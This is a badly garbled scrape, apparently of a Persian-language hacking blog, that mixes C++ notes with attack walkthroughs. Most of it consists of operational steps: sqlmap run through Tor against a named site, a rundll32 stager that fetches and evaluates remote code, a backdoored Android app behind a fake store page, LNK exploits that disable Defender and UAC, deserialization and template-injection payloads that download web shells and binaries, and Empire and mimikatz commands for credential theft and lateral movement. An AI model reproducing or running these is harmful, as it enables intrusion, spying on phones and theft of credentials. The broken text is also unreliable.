creates=”” guarded=”” regions–=”” spawns=”” lot=”” processes–=”” tries=”” sleep=”” time–=”” sections–=”” id–=”” loop–=”” interact=”” drivers–=”” inputکافیست=”” overload=”” هندل=”” کلیات=”” برسیم=”” class=”” a,=”” public:=”” ######(int=”” x,int=”” y)=”” ######(){}=”” operator-(######=”” c)=”” c.a;=”” c.b;=”” ######(a,=”” b);=”” print()=”” “a=”” is:=”” };=”” m(10,=”” 15);=”” n(20,=”” 25);=”” o;=”” o=”m” n;=”” o.print();=”” پرانتزی=”” کلاس,اما=”” میریزهنکته=”” خودنمایی=”” عملگری=”” هست!=”” گفتیم=”” ارجاع=”” کنی=”” کلاس,نکته=”” ()print=”” پاس=”” بلایی=”” سرشون=”” سربارگذاری_عملگرها-#mitm=”” tunnelingدر=”” pptp=”” cleartext=”” ciphertext=”” میتوانیم=”” inject=”” xss=”” hook=”” باشیم.این=”” بیاید=”” تونلی=”” اندازی=”” cipher=”” tsl=”” هاتی=”” اتفاق=”” افتاد,اما=”” هرچیز=”” pptpd;gem=”” 2.cd=”” ;.=”” tab3.touch=”” dns.conf;echo=”” “local=”” .*twitter\.com”=”” 4.bettercap=”” 192.168.0.234-238=”” –proxy=”” –proxy-module=”” injectjs=”” 127.0.0.1:3000=”” hook.js”=”” –proxy-pem=”” .bettercap=”” bettercap-ca.pem=”” –no-sslstrip=”” tab5.wget=”” twitter.com=”” login”=”” 6.sed=”” ‘s#\#localip=”” 192.168.0.1#localip=”” 192.168.0.1#g’=”” pptpd.conf;sed=”” ‘s#\#remoteip=”” 192.168.0.234-238,192.168.0.245#remoteip=”” 192.168.0.234-238,192.168.0.245#g’=”” #ms-dns=”” 10.0.0.1=”” ms-dns=”” 8.8.8.8=”” ppp=”” pptpd-options;sed=”” 10.0.0.2=”” 8.8.4.4=”” pptpd-options;echo=”” “######=”” *”=”” chap-secrets=”” start;iptables=”” postrouting=”” masquerade;iptables=”” forward=”” ppp0=”” accept;iptables=”” –state=”” established,related=”” accept;echo=”” “1”=”” ipv4=”” ip_forward;route=”” -n;netstat=”” -putan=”” 1723=”” back=”” tab8.run=”” pptp_tunnel=”” vpnhost=”(WAN)9.run” inject_host=”” inject_ca=”” cafile=”/root/.bettercap/bettercap-ca.pem” خواستم=”” نمیخوام=”” چندتا=”” سریع=”” اومدیم=”” هاستی=”” کنمش=”” میسازم=”” twitter=”” ببینه=”” ساختم=”” میبینه=”” آیپی=”” حضور=”” خواستی=”” sniff=”” هشت=”” مجموع=”” rule=”” accept=”” یازده=”” tls=”” .#bypass=”” ips=”” ids=”” sqliدر=”” معروف=”” زنده,که=”” هستش.در=”” بدم,زمانی=”” پنتستر=”” واسته=”” اسکنرها=”” interupter=”” database=”” میفرستیم=”” فیلترینگ=”” آزمون=”” java=”” serialize=”” نفوذی=”” defensive=”” مرورگرها=”” اعمال=”” فرستید=”” بشوند,مکانیزم=”” طبیعی=”” دارند,زمانی=”” معمولی=”” نداده=”” بدهید=”” ban,اما=”” تفاوتی=”” دوی=”” شاخصه=”” فضا=”” میدن,تشخیص=”” بلاک=”” شدنopen=”” terminal1.echo=”” 9050″=”” proxychains.conf;apt-get=”” tor;service=”” 2.sqlmap=”” sanjesh.org=”” fullstory.aspx?gid=”5&id=5836′” –level=”5″ –risk=”3″ –dbms=”mssql” –dbs=”” –mobile=”” –threads=”10″ –identify-waf=”” –batch=”” –tor-type=”SOCKS4″ –tor-port=”” –tamper=”randomcase,percentage” عادی=”” مبینید=”” اجازه=”” میخوره3.git=”” stamparm=”” fetch-some-proxies.git;cd=”” fetch-some-proxies;chmod=”” *;sed=”” #random_chain=”” random_chain=”” proxychains.conf;sed=”” strict_chain=”” #strict_chain=”” proxychains.conf;proxychains=”” fetch.py=”” –type=”SOCKS4″ –output=”socks4.txt;sed” ‘s#:=”” #g’=”” socks4.txt;sed=”” ‘s#:#=”” socks4.txt;cat=”” socks4.txt=”” 4.service=”” restart;cd=”” ;reset;proxychains=”” –timeout=”10″ chain=”” زنده=”” خورده=”” سلامت=”” برگشته,=”” randomcase=”” percentage=”” شمایل=”” obf=”” طرفی=”” زنجیره=”” نتونه=”” threading=”” رهگیری=”” براتون.https:=”” intrusion-detection-evasion-attackers-burglar-alarm-1284#bypassavs=”” objects=”” obfدر=”” stager=”” دستمون=”” سازیش=”” سبکی=”” کرد.-2kedited [2:03:56=”” pm]-> -> photoهمونطور=”” دل=”” runer=”” rundll32.exe=”” مفسر=”” کنیدrundll32.exe=”” javascript:”\..\mshtml,=”” runhtmlapplication=”” “;x=”new%20ActiveXObject(“Msxml2.ServerXMLHTTP.6.0”);x.open(“GET”,”http://######.ddns.net:4141/eeA6b”,false);x.send();eval(x.responseText);window.close();” wbemscripting.swbemlocator=”” win32_process=”” پراسسی=”” وسط=”” اول:=”” چیو=”” میشناسیم=”” افته؟=”” get=”” سواره=”” دوم:=”” activexobject=”” ۷=”” shell=”” پراسس=”” گیج=”” ابداع=”” نو=”” ظهور=”” بودنش=”” امان=”” بسنده=”” محصول=”” روس=”” استاد=”” عروس=”” شوهر=”” شدند=”” هستند,نکته=”” سوم:=”” حدی=”” فیما=”” r<!=”#+/*]-([_&%?$>)u<!=#+/*]-([_&%?$>)n<!=#+/*]-([_&%?$>)d<!=#+/*]-([_&%?$>)l<!=#+/*]-([_&%?$>)l<!=#+/*]-([_&%?$>)” <!=”#+/*]-([_&%?$>)” نمیشد=”” بزارم=”” خاطر=”” rundll=”” replace=”” مقدارyhdrhqfhpcjz.create(replace(“payload;”,=”” “<!=”#+/*]-([_&%?$>)”,” “”)=”” result=”” replace:=”” “”=”” پوچ=”” نمیده=”” vbscripthttps:=”” 164787=”” info-windows-rundll-and-rundll32-interface-#machine=”” obfuscatingدر=”” ماشین=”” سطوح=”” بخوایم=”” hard=”” disk=”” detect=”” تحلیلگر=”” میدند…مدر=”” میندازیم=”” بشم,خب=”” افته=”” چی؟؟=”” asa=”” cisco=”” خرابکار=”” سیستمی=”” داخلی=”” رصدها=”” <connect_socket=”” remote_addr=”192.168.1.163″ remote_port=”25″ successful=”1″ winsock_result=”10035″ 0a=”” 0019=”” 025d0ce6=”” 00343365=”” connect_socket=”” remote_address=”” xml-data=”” برسه=”” درصد=”” interupt=”” خطرناک=”” همینجا=”” غیرمجاز=”” drop=”” میکنه,خب=”” میخوای=”” خودتو=”” بزنی=”” کردی=”” کنی؟؟؟=”” بدی=”” میکردیم,اما=”” میشنpolymorphic,metamorphic,mimimorphic,hemimorphic,oligomorphic=”” مشهور=”” polymorphic=”” ریختگی=”” گذاشت=”” ابهام=”” کنن???un-obfuscated=”” unique=”” substring=”” *binary=”” plain=”” *segments=”” oligomorphism=”” algorithmic=”” *simple=”” transformation=”” (xor)=”” *build=”” transformations=”” polymorphism=”” statistical=”” *compression=”” *anomalies=”” body=”” metamorphism=”” pattern=”” matching=”” *meta=”” (p-code)=”” *n-gram=”” signatures=”” art=”” semantic=”” *control-flow=”” *persist=”” high-level=”” fingerprints=”” *byte=”” frequency=”” manipulation=”” متقابلی=”” تقابل=”” پیروز=”” ماموریتی=”” mimimorphic=”” mimic=”” بهتری=”” فردا=”” ,قبل=”” میدهwindows=”” com-dll=”” handling-filesystem-icmp-inifile-internet=”” helper-mutex-network-registry-process-category-windows=”” services-system-systeminfo-thread-user-virtual=”” memory-window-winsock-protected-storage-windows-hooks=”” سرویسی=”” کنیم,تکنیک=”” بصوت=”” درختی=”” میکه=”” چیده=”” میشند=”” بکنید=”” pushdecmov0*10=”” 1cmp=”” *0=”” 1xchg=”” movدر=”” دستورpush=”” بگیره؟=”” cmp=”” xchg=”” mov?=”” پاسخ=”” تصویری=”” prng=”” steganography=”” تصادفی=”” میدونه=”” rpng=”” هست,اینها=”” xorpushdec*0=”” inc0=”” 1mov=”” pushدر=”” 00010100=”” وبالا=”” برو=”” شرطه=”” mov=”” شرطی=”” huffman=”” tree,درختی=”” هافمن=”” فرکانس=”” نماد=”” شود,در=”” رمزنگای=”” درخت=”” هوفمن=”” رمزگشایی=”” symbols=”” accord=”” بازیابی=”” میکنیم,یک=”” میزنم*0=”” 1*=”” s0=”” asymbol:=”” symbol=”” 00=”m” 01=”a” (6bit)=”” 000111=”=>” (32bit)=”” سمبل=”” تفسیر=”” شداین=”” ها….https:=”” www.semanticscholar.org=”” normalizing-metamorphic-malware-using-term-walenstein-mathur=”” 28a002585c8563d19e8d166379a83e3df9269b0bhttps:=”” nsuworks.nova.edu=”” cgi=”” viewcontent.cgi?referer=”&httpsredir=1&article=2006&context=gscis_etd#APK” (bind=”” spearphishing)در=”” اپلکیشن=”” نسبت=”” حملاتی=”” spearphishing=”” میگیرم=”” واقعی=”” بیاد…-1.9kedited [10:19:15=”” pm]-> -> photoقبل=”” فازش=”” صیغه=”” یاب=”” امسال=”” طلاگرام=”” غیره,اکی=”” سناریو,=”” imo=”” اینکارhttps:=”” play.google.com=”” store=”” apps=”” details?id=”com.imo.android.imoim&hl=enاز” پلی=”” بدهhttps:=”” apps.evozi.com=”” apk-downloader=”” کردید=”” imo.apk=”” کنید,نکته=”” شروع,برنامه=”” noip=”” terminal1.noip2;noip2=”” -s;ifconfig;service=”” start;gnome-terminal=”” –tab=”” ‘ngrok=”” 80’=”” 2.nano=”” autoand.rc=”” addedsysinfo=”” check_root=”” getwd=”” geolocate=”” screenshot=”” dump_calllog=”” dump_sms=”” dump_contacts=”” webcam_snap=”” sdcard=”” dcim=”” camera=”” enterدر=”” ترمینال,اما=”” تلفن=”” گالری=”” کرد3.msfvenom=”” android=”” dalvik=”” imo-b.apk=”” تداخلات=”” قطعی=”” میدیم,درضمن=”” 4141=”” 4444=”” isp=”” صحنه=”” بلکل=”” مسدود=”” امتحان=”” فوش=”” ندید=”” گفتند=”” :)))=”” 4.gnome-terminal=”” ‘msfconsole=”” example.ddns.net;set=”” 192.168.1.4;set=”” autoand.rc;exploit=”” -j”‘=”” داد5.wget=”” cafebazaar.ir=”” com.imo.android.imoim=”” ?l=”fa”” معتبر=”” بسازه=”” link=”” قبول=”” خودمون6.sed=”” ‘s#<=”” body>#<iframe=”” id=”frame” width=”0″ height=”0″ style=”hidden” frameborder=”0″ marginheight=”0″ marginwidth=”0″ scrolling=”no>>\\n<script” >settimeout(function(){window.location.href=”https://cafebazaar.ir/app/com.imo.android.imoim/?l=fa” ;},=”” 15000);<=”” body>#g’=”” پیشنهاد=”” انگاری=”” pop=”” گذشت=”” ۱۵=”” bazaar=”” جعلی=”” 7.gnome-terminal=”” ‘firefox=”” e79129e7.ngrok.io’=”” نه…#usb=”” cpl=”” (stuxnet)در=”” داشتند=”” autorun=”” lnk=”” cve-2010-2568=”” shortcut=”” شد,یک=”” جانبی=”” shared=”” folder=”” cve-2017-8464=”” است.http:=”” www.geoffchappell.com=”” notes=”” ctrlfldr.htm به=”” خلاصه،=”” پیوند=”” cplapplet=”” هستش,اما=”” جالبه=”” اجراش=”” کرد,cpl=”” click=”” control.exe=”” file.cpl=”” مثال:obj=”CreateObject” (“shell.application”)=”” obj.controlpanelitem=”” (“######.cpl”)=”” control_rundll=”” control_rundllasuser=”” shell32.dll=”” زیره:cpl=”” index=”” شاخص=”” اپلتapplet=”” appletیک=”” اپلت=”” multitabbed=”” ندارد,هنگامی=”” میشه،=”” کنه,برای=”” مفدار=”” cplapplet:long=”” cplapplet(=”” hwnd=”” hwndcpl,=”” uint=”” umsg,=”” lparam=”” lparam1,=”” lparam2=”” );=”” pe32=”” وpe32+=”” cve-2015-0096=”” dynamic=”” specialfolderdatablock=”” خوردنش=”” میشه,استفاده=”” ویژوال=”” استودیو=”” بدیمint=”” cplapplet(hwnd=”” message,=”” lparam2)=”” محل=”” پایلود…=”” dllmain=”” نباشیم,بنابراین=”” کنیمinit=”” cpl_init=”” getcount=”” cpl_getcount=”” inquire=”” cpl_inquire=”” cpl_select=”” dblclk=”” cpl_dblclk=”” cpl_stop=”” exit=”” cpl_exit=”” newinquire=”” cpl_newinquire=”” startwparms=”” cpl_startwparms=”” otherwise,=”” cpload=”” send=”” all=”” messages=”” cplapplet()=”” اکسپلویتش=”” 2017=”” میدیم…#=”” cpl-attack=”” #visit=”” dashboard.ngrok.com=”” signupvisit=”” (authtoken)=”” authمن=”” خلاص=”” میشیم=”” real=”” جورای=”” ایمنی=”” forensic=”” نشدن=”” کنهinstall=”” ngrokopen=”” terminal1.shell=”#!” “$shell=”” bash”=”” ngrok;echo=”” “$@”‘=”” ngrok;mkdir=”” ngrok;chmod=”” ngrok;cd=”” ngrok;wget=”” bin.equinox.io=”” 4vmdza7iahb=”” ngrok-stable-linux-amd64.zip;unzip=”” ngrok-stable-linux-amd64.zip;rm=”” ngrok-stable-linux-amd64.zip=”” icon=”” فرمانی=”” میسازم2.apt-get=”” tor;echo=”” proxychains.conf;service=”” ;ngrok=”” authtoken=”” (authtoken);gnome-terminal=”” ‘proxychains=”” 4444’=”” (porttcp)اما=”” ازای=”” میکنیمinstall=”” netripper3.git=”” nytrorst=”” netripper.git;mkdir=”” netripper;cp=”” netripper=”” netripper.rb=”” netripper.rb;cp=”” dll.x86.dll=”” dll.x86.dll;cp=”” dll.x64.dll=”” dll.x64.dll;rm=”” sniffer=”” کنیمcteate=”” postexp4.nano=”” autowin.rc=”” gettelnet=”” sticky_keys=”” sc=”” sharedaccess=”” “reg=”” hklm\software\microsoft\windows\currentversion\policies\system=”” v=”” enablelua=”” t=”” reg_dword=”” f”=”” service_control=”” wscsvc=”” windefend=”” processnames=”firefox.exe” verbose=”true” enum_av_excluded=”” نیمه=”” ارتقا=”” telnet=”” داد5.msfconsole=”” fileformat=”” cve_2017_8464_lnk_rce;set=”” (porttcp);exploit=”” shikata_ga_nai;exit”;mkdir=”” usb;mv=”” .msf4=”” usb;reset;msfconsole=”” 4444;set=”” autowin.rc;exploit=”” cve_2017_8464_lnk_rce=”” پایلودش=”” فولدر=”” فلش=”” نبودن=”” شد…avi######=”” 355https:=”” www.symantec.com=”” security-center=”” vulnerabilities=”” writeup=”” 98818https:=”” nixawk=”” labs=”” exploit_cve-2017-8464.py#php=”” injectionدر=”” serialization=”” کنیم,البته=”” سالها=”” است…-خب=”” پلتفرم=”” پارامترها=”” هستش,زبان=”” phpیک=”” بارگیری=”” کنه,=”” ()serialize=”” ()unserialize=”” فهم=”” دقیقتر=”” میکنیم<?php=”” $object=”new” stdclass();=”” $object->data=”Some data!” $cached=”serialize($object);” شی=”” سپس=”” شیء=”” میکنه,به=”” o:8:”stdclass”:1:{s:4:”data”;s:10:”some=”” data!”;}=”” serialized=”” نشانه=”” stdclass=”” خواص=”” جسم=”” براکت=”” مجعد=”” arrays-integers-strings-objects-null=”” مثال،=”” length=”” میشه,امابرای=”” unserialize=”” فرایندی=”” میگیره؟=”” ببینید<?php=”” data!”;}’);=”” $object->data;=”” آسانی=”” کنه،=”” ممکن=”” usersession=”” global=”” $_session=”” ببره,اما=”” developing=”” مخاطرات=”” بیاره=”” چطور؟!=”” منتقل=”” بشه!!!=”” مثال:<?php=”” loggingclass=”” __construct($filename,=”” $content)=”” $this->filename=”$filename” “.log”;=”” $this->content=”$content;” __destruct()=”” file_put_contents($this->filename,=”” $this->content);=”” $data=”unserialize($_GET[‘data’]);” ()__destruct=”” دریافتی=”” رایتش=”” نامی=”” آورد,خب=”” اسمی=”” میشه!=”” پایلودها=”” بهتون open=”” terminal1.ngrok=”” 2.service=”” start;weevely=”” 0098=”” weevely.txt=”” کنیمo:12:”loggingclass”:2:{s:8:”filename”;s:11:”weevely.php”;s:7:”content”;s:78:”<?php=”” (‘wget=”” 75c896cc.ngrok.io=”” ######.php’);=”” ?>”;}=”” ()system=”” ######.php=”” شل=”” تزریقی=”” کاراکتری=”” 78=”” بگذارید3.proxychains=”” pressreleases=”” ######.php=”” 0098=”” شید,هم=”” پایلودهای=”” هستش…https:=”” frohoff=”” ysoserialhttp:=”” php.net=”” manual=”” function.serialize.phphttps:=”” grrrdog=”” java-deserialization-cheat-sheet#php=”” core=”” vulnerabilitiesدر=”” میده,=”” webapplication=”” بیس=”” حافظه؟:)-آسیب=”” علت=”” اشتباهات=”” میده.=”” پیگیری=”” شوند،=”” منبع=”” امنه=”” مترجم=”” هستش.=”” پست،=”” اشکالات=”” بده,آمار=”” 93=”” کنند,=”” مابقی=”” ویرایشی=”” میکنند,=”” 5.6=”” شود،=”” چند,=”” انتشار=”” پچ=”” گذشته=”” است,=”” 62=”” 5.6.30=”” ژانویه=”” شده,با=”” 79=”” interpreter=”” بود,=”” دلایل=”” بخوان=”” کدهایی=”” بهم=”” خورد=”” chenge=”” افتاده=”” کنیدhttps:=”” secure.php.net=”” de=”” migration70.changed-functions.phpخب=”” حفره=”” کرد,اما=”” کنیم,=”” بالاست=”” سفارشی=”” نداره,=”” نمیتونند=”” corruption=”” بشوند,اما=”” عوض،=”” کند,=”” تأثیر=”” بگیره,در=”” واقع،=”” 5،700=”” میشه,=”” <?php=”” feature();=”” —>=”” (zend=”” engine)=”” (c=”” feature)=”” است:unserialize()=”” 7.0.15=”” cve-2017-5340=”” wddx_deserialize()=”” pointer=”” dereference=”” cve-2016-10162=”” curl_escape()=”” 7.0.10=”” cve-2016-7134=”” str_pad()=”” 7.0.4=”” cve-2016-4537=”” utf8_encode()=”” cve-2016-4345=”” imagerotate()=”” 5.5.31=”” incorrect=”” cve-2016-1903=”” terminal1.searchsploit=”” 2.cat=”” dos=”” 38122.txt=”” yet=”” another=”” after=”” free=”” unserialize()=”” splobjectstorageدر=”” کرد…https:=”” reports=”” 141956https:=”” using_freed_memory#access=”” specifier=”” c++میخوایم=”” mitigation=”” بخصوصی=”” میکند=”” قواعد=”” برجسته=”” کرد…-در=”” هنگامی=”” متغیری=”” :public=”” منظوره=”” متغیرهای=”” نمای=”” public-private-protected=”” متغیرهارو=”” #privateدر=”” است#publicدر=”” عمومی=”” میگیرند#protectedدر=”” بودقبل=”” پرداختن=”” فرق=”” مقوله=”” متغیرهایی=”” میباشند,=”” مفید=”” کرد!=”” prototype=”” مذکور=”” ::=”” مثال:#include=”” dateclass=”” private:=”” day;=”” month;=”” year;=”” setdate(int,=”” int,=”” int);=”” printinfo()=”” day=”” month=”” year=”” dateclass::setdate(int=”” d,=”” m,=”” date;=”” date.setdate(2,=”” 5,=”” 2018);=”” date.printinfo();=”” آمدنش=”” چیست؟=”” موضوعی=”” encapsulation=”” میخواهد=”” بنویسد,=”” راهکارهایی=”” سردرگمی=”” بیاورد=”” objective=”” فرایندهای=”” متعدد=”” میزنم:فرض=”” فرایند=”” برگردونه=”” بخواید=”” بسان=”” بنویسید,=”” هربار=”” نمینویسیم=”” مینویسیم=”” بالاخره=”” کنم؟=”” num=”” کنم,دلیل=”” متشکل=”” بزنه!!!=”” دلایلی=”” کردم…https:=”” access_modifiers#server=”” template=”” پوسته=”” کرد,آسیب=”” ssti=”” اشتباهی=”” دستورالعمل=”” دلخواه=”” … اما=”” render=”” مداوم=”” شناسندmako-jinja2-python=”” (code=”” eval)-tornado-nunjucks-pug-dot-marko-javascript=”” eval)-dust=”” (<=”dustjs-helpers@1.5.0)-EJS-Ruby” eval)-slim-erb-smarty=”” (unsecured)-php=”” eval)-twig=”” (>1.19)-smarty=”” (secured)-dust=”” (>=”” dustjs-helpers@1.5.0)=”” میکنه,=”” موتورهای=”” bracket=”” زیر${{0090+8}}=”” اومدhello=”” $0098=”” میده؟=”” flask=”” flask,=”” jinja2=”” environment=”” @app.route(“=”” page”)=”” page():=”” output=”Jinja2.from_string(‘Hello” ‘!’).render()=”” “__main__”:=”” app.run(host=”0.0.0.0″ داده!؟=”” خام=”” شده,منظورم=”” میکنه…خب=”” همینجاس=”” from_string=”” terminal1.curl=”” www.target.com=”” page?name=”{{7*7}}'” 49!در=”” response=”” مضربی=”” سادگی=”” م=”” کنید2.service=”” c32bfbfd.ngrok.io=”” localhost:803.msfvenom=”” ######.elf;gnome-terminal=”” 4.curl=”” ”.__class__.__mro__[2].__subclasses__()[40](‘=”” unk9.cfg’,=”” ‘w’).write(‘from=”” subprocess=”” check_output\n\nruncmd=”check_output\n’)” }}’=”” 5.curl=”” config.from_pyfile(‘=”” unk9.cfg’)=”” }}=”” 6.curl=”” config[‘runcmd’](‘wget=”” ######.elf;chmod=”” ######.elf;=”” ######.elf’,shell=”True)” آمدیم=”” رزرو=”” 64bit=”” دایکتوری=”” آمیز=”” ما,اما=”” runcmd=”” permission=”” نظرش=”” حتما=”” نظرتون=”” دارهfreemaker5.<#assign=”” ex=”freemarker.template.utility.Execute” ?new()>=”” ${=”” ex(“id”)=”” velocity5.class.inspect(“java.lang.runtime”).type.getruntime().exec(“sleep=”” 5″).waitfor()=”” smarty5.{smarty_internal_write_file::writefile($script_name,”<?php=”” passthru($_get[‘cmd’]);=”” ?>”,self::clearconfig())}=”” sandbox=”” twig=”” حساس=”” exec=”” اتخاذ=”” دادtwig5.{{_self.env.registerundefinedfiltercallback(“exec”)}}=”” 6.{{_self.env.getfilter(“id”)}}=”” عملکرد=”” twigphp=”” d63ac2088e8d30137cde10f310ab89b06dab916b=”” securitypolicy.php#l83اما=”” tplmap=”” کنید7.git=”” epinna=”” tplmap.git;cd=”” tplmap;chmod=”” *;pip=”” 8..=”” tplmap.py=”” –os-shell=”” 9..=”” 192.168.56.101:3000=”” ti?user=”*&comment=supercomment&link”” 10..=”” jade=”” فرضی=”” pentester=”” بالاتری=”” extension=”” menu=”” burp=”” کنید…امیدوارم=”” کرد…11.mkdir=”” jython;wget=”” search.maven.org=”” remotecontent?filepath=”org/python/jython-installer/2.7.0/jython-installer-2.7.0.jar'” jython_installer.jar;java=”” -jar=”” jython_installer.jar=”” jython=”” standard;pip=”” pyyaml=”” requests=”” extender=”” …=”” (jython-installer.jar)go=”” extensions=”” type:=”” (python)=”” burp_extension=”” burp_extender.pyیه=”” احمقی=”” گزاشته=”” میگفت=”” یادش=”” بخیر…https:=”” 125980https:=”” 46386https:=”” startupبد=”” مستند=”” برگرفته=”” ایده=”” ارمغان=”” مطمعن=”” بریم… قبل=”” آپ=”” بپردازم=”” تحقیقاتم=”” خدمت=”” عزیزان=”” مقایسه=”” خصوص,=”” غرب=”” رواج=”” متاسفانه=”” ناچار=”” پدر=”” سوختگی=”” متمرکز=”” آپی=”” سرگرم=”” مالی=”” وابسته=”” شگفت=”” انگیزی=”” سازماندهی=”” دانشگاهی=”” بشه…خب=”” علاقمندان=”” میارند=”” آوردم=”” آنجایی=”” میگرده=”” خوشبین=”” فرزندانشان=”” علاقمندانه=”” خودسازی=”” نمیکنند=”” خانوار=”” یکیش=”” نمیدونه=”” آگاه=”” نمیکنه….اما=”” ؟!=”” استناد=”” فهمید=”” درآمدزا=”” کشورها=”” هستش,=”” جوانان=”” نکردند؟=”” اشراف=”” برهم=”” ngo=”” اند؟=”” کهنه=”” صدد=”” تشکیل=”” نبوده=”” بصیرت=”” سرآیند=”” تشکیلات=”” اونها,=”” مگه=”” فضاهایی=”” نداشتیم=”” محصولات=”” offensive=”” اید؟=”” محصولاتی=”” nessus=”” tenable=”” سرمایه=”” خدمات=”” ارز=”” شدنی=”” چشمی=”” اراده=”” فتح=”” قله=”” جامعه=”” گاز=”” ببرند=”” استارآپ=”” میلیون=”” دلاری=”” هرگز=”” نفره=”” دولتی=”” بیایند=”” کثیری=”” جذب=”” روشنی=”” بدیم,اولین=”” اپ=”” تونست=”” خودی=”” vip=”” سرپا=”” نیستم,=”” avandcloud=”” معروفی=”” ندیدمش=”” متنوع=”” cybereason=”” میگیرفت=”” تهاجمی=”” جنگ=”” حکومت=”” کنه….https:=”” cyber-map=”” threat-map.htmlhttp:=”” exploitpack.com=”” packs.htmlhttps:=”” www.trendmicro.com=”” en_us=”” business.htmlhttps:=”” www.cybereason.com=”” active-monitoringhttps:=”” www.tenable.com=”” products=”” nessus-professional#cfg=”” mitigationدر=”” 8.1=”” چیا=”” بوده…مکانیزم=”” cfg=”” flow=”” guard=”” نمایان=”” مقاومت=”” میداد,=”” nx=”” میگرفت,=”” میکرد=”” میکردیم؟=”” خنثی=”” virtualprotect()=”” میگرفت=”” مینوشت=”” push=”” استک=”” بردم=”” میشدند=”” میخورد,اما=”” آمدن=”” افتاد=”” snapshot=”” ازشون=”” شعاع=”” دفعات=”” وقفه=”” نشده=”” کنه!!!=”” بشه,=”” cfi=”” integrity=”” تصدیق=”” هستش,به=”” دلیله=”” محافظ=”” integrity,=”” مجاز=”” صحت=”” میکند,اما=”” میکنه؟=”” userland=”” ساختمان=”” هستشdd=”” __guard_check_icall_fptr=”” guardcfcheckfuntionpointerdd=”” reserved2dd=”” __guard_fids_table=”” guardcffuntiontabledd=”” 1929=”” guardcffuntioncountdd=”” 3500h=”” guardflagsاولین=”” کلیدی=”” هستشدومین=”” گر=”” هستشسومین=”” جدول=”” cfgچهارمین=”” پرچم=”” داد.-#dep bypassمکانیزم=”” کارشان=”” میپردایم..initialize=”” ldrsystemdllinitblock•=”” +0x60=”” :=”” bitmap=”” address•=”” +0x68=”” size•=”” initialized=”” by=”” psppreparesystemdllinitblock•=”” ntcreateuserprocess->pspallocateprocess->pspsetupuserprocessaddressspaceldrpcfgprocessloadconfig•=”” headers->optionalheader.dllcharacteristics•=”” image_dllcharacteristics_guard_cf=”” flag=”” •=”” loadconfig->guardcfcheckfunctionpointer•=”” ldrpvalidateusercalltargeاکی=”” ldrsystemdllinitblock=”” ntcreateuserprocess=”” pspallocateprocess=”” pspsetupuserprocessaddressspace=”” میباشد,=”” بلوکه=”” میره,=”” ldrpcfgprocessloadconfig=”” optionalheader.dllcharacteristics=”” مشخصات=”” image_dllcharacteristics_guard_fc=”” گره=”” guardcfcheckfuncationpointer=”” ldrpvalidateusercalltarget=”” مختصر=”” مکانیزم,=”” میخواستم=”” شد,دور=”” مطرح=”” میکنم.=”” gadgets=”” (generic=”” bypass)shifted=”” pointers=”” (32-bit=”” bypass)virtual=”” hijacking=”” control-flow_integrityhttps:=”” secbp=”” control-flow-guardhttps:=”” packetstormsecurity.com=”” files=”” 145220=”” chakra-cfg-bypass-due-to-bug-in-serverfreeallocation.htmlhttps:=”” us-15=”” materials=”” us-15-zhang-bypass-control-flow-guard-comprehensively-wp.pdf-#empire=”” exploitationدر=”” empire=”” چندسالی=”” شدنش=”” نمیگذره=”” اقدامات=”” میشه…این=”” harmj0yhttps:=”” sixdubhttps:=”” enigma0x3این=”” تونسته=”” 300=”” اهدافی=”” ایفای=”” سرچشمه=”” میگیرد=”” evasion=”” بودند=”” stageless=”” رندرهای=”” dcom=”” رسانده=”” excel=”” کنید,من=”” empireproject=”” empire.git;cd=”” setup=”” requirements.txt;bash=”” install.sh;cd=”” برنامه،=”” listener=”” میکنیم2.listeners=”” 3.uselistener=”” 4.set=”” 5.set=”” host=”” example.ddns.net=”” 6.set=”” bindip=”” 192.168.1.4=”” 7.usestager=”” 8.set=”” 9.generate=”” autoopen()=”” document_open()=”” debugging()=”” variant=”” str=”” “aw1wb3j0ihn5cztpbxbvcnqgcmusihn1ynbyb2nlc3m7y21kid0gin”=”” “bzic1lzib8igdyzxagtgl0dgxlxcbtbmln1ynbd0y2ggfcbncmvwic”=”” “jkkgnoyxipxlnbkfnbapbxbvvd0ru1tqxsklmju2xskpcmv4zwmojy”result=”system(“echo” “”import=”” sys,base64;exec(base64.b64decode(\””=”” \””));””=”” &”)=”” allopen=”” alt+f8=”” name:=”” (debugging)=”” create=”” allsend=”” targetخب=”” مراحلی=”” کنید,=”” 2016=”” basic=”” applicaton=”” کنیم،=”” میگذاریم=”” ctrl+a=”” ctrl+v=”” فشاریم=”” پیشرفته=”” مونده=”” شک=”” نکنه…فایل=”” agent=”” اذیت=”” meterpreter(ssl)10.list=”” (agent)11.rename=”” (agent)=”” victim=”” tab12.msfconsole=”” migrate;exploit=”” listening=”” 443=”” فعالش=”” listeners=”” کنید,back=”” tab13.listeners=”” 14.set=”” meter=”” 15.set=”” 16.set=”” 17.set=”” 18.set=”” certpath=”” empire-chain.pem=”” 19.execute=”” میدم,=”” کنید20.interact=”” 21.injectshellcode=”” 22.set=”” 23.set=”” 24.execute=”” see=”” tabدر=”” شدیم=”” injectshellcode=”” است,bypassuacback=”” tab25.bypassuac=”” *enter*or(token)26.back=”” 27.usemodule=”” credentials=”” tokens=”” 28.run=”” pid=”” hijack=”” هویت=”” بشه…copy=”” (administrator=”” processid)29.usemodule=”” management=”” psinject=”” 30.set=”” procid=”” processid)31.set=”” 32.run=”” بشهpivoting33.isteners=”” 34.set=”” ######2=”” 35.set=”” 36.set=”” 37.set=”” 38.execute=”” 39.interact=”” 40.usemodule=”” situational_awareness=”” powerview=”” find_l=”” 41.set=”” 42.execute=”” میگردیم=”” میکشیم=”” میکنیمcopy=”” (computernames)43.back44.usemodule=”” lateral_movement=”” invoke_psexec=”” 45.set=”” 46.set=”” computername=”” (computername)47.execute=”” *enter*ما=”” میپردازیمprivilege48.agents=”” (newagent)49.rename=”” (newagent)=”” victim2=”” 50.interact=”” 51.usemodule=”” code_execution=”” invoke_shellcode=”” 52.set=”” 53.set=”” 54.execute=”” 48=”” تازه=”” 49=”” 50=”” ,در=”” کردpersistence56.back=”” 57.usemodule=”” elevated=”” schtasks=”” 58.set=”” onlogon=”” 59.set=”” 60.execute=”” تایمر=”” باری=”” تایمه=”” بیار,=”” پرداختnetwork=”” sharing61.back=”” 62.interact=”” 63.usemodule=”” sharefinder=”” 64.run=”” نامش=”” فولدرهای=”” شیر=”” میمونیم=”” خواسته=”” بکشه=”” کنیمadd=”” admin65.back=”” 66.usemodule=”” mimikatz=”” dcsy=”” 67.set=”” avi\12341234=”” 68.run=”” 69.creds=”” میباشد,detected=”” bugs70.back=”” 71.usemodule=”” privesc=”” powerup=”” allchecks=”” 72.set=”” 